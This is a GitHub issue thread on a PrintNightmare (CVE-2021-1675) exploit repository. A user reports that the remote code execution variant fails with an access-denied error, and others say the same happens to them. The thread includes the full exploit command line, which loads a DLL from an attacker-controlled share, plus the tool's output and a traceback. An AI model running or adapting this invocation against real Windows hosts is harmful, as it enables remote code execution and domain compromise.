CVE-2021-1675 icon indicating copy to clipboard operation
CVE-2021-1675 copied to clipboard

Published 20 hours ago verified publisher icon cube0x0

Access Denied on unpatched systems

Open bananabr opened this issue 3 years ago • 3 comments

Hi,

I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.

Domain Controller: image

Victim domain member: image

This is the result:

python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Any help is appriciated.

bananabr avatar Jul 23 '21 20:07 bananabr

me too

wxh0000mm avatar Sep 03 '21 06:09 wxh0000mm

same here

isounikeko avatar Nov 04 '21 15:11 isounikeko